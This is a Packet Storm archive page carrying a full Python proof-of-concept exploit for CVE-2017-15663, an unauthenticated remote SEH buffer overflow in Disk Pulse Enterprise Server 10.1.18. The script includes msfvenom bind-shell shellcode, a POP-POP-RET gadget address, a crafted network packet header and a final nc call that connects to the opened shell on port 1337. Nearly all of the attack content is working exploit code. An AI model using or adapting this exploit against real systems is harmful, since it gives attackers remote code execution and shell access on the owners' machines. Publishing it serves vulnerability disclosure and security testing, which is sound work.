exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Disk Pulse Enterprise 10.1.18 Buffer Overflow

Disk Pulse Enterprise 10.1.18 Buffer Overflow
Posted Jan 15, 2018
Authored by Ahmad Mahfouz

Disk Pulse Enterprise version 10.1.18 buffer overflow exploit that binds a shell.

tags | exploit, overflow, shell
advisories | CVE-2017-15663
SHA-256 | 06882870395e26f373aefe6fdfea46528578d60dcdde572d1661a9bd7d49ca5a

Disk Pulse Enterprise 10.1.18 Buffer Overflow

Change Mirror Download
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe



from struct import pack
from os import system
from sys import exit
from time import sleep
import socket



port = 9120
host = '192.168.72.231'


stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
stage1 += "\x83\xc4\x04" # metasm > add esp,4
stage1 += "\xff\xe4" # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'

buf = "\x90" * 10
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"

shellcode = buf
payload = 'A' * 124 #offset
payload += '\xeb\x09\x90\x90' #jmp over seh retrun value
payload += '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1
payload += '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode



header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload





s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[*] Testing connection to tatget %s:%s" %(host,port)
s.connect((host, port))

except:

print "[-] Unable to communicate to target %s:%s" %(host,port)

exit()



s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)


Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close